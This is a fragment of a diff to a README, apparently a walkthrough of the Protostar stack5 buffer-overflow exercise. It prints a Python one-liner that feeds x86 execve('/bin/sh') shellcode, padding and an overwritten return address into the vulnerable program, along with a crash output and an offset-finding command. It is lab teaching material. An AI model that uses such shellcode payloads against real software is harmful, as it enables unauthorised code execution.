le91688/protostar/README.md

 python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80'+('a'*48)+'\xe0\xd5\xff\xff'" | ./stack5
 Illegal instruction (core dumped)   #not so fast!
 ```
 So what happened?
-Well, there are some differences in how the program runs when you run it normally and within GDB.
+Well, there are some differences in how the program runs when you run it normally and within GDB (guessing due to env variables, a wrapper will also fix this ).
 So we will take a look at the core dump to see what's going on and see where exactly everything sits in memory when a user runs the program.
 ```bash
 $ python -c "print 'a'*76+'xxxx'" | ./stack5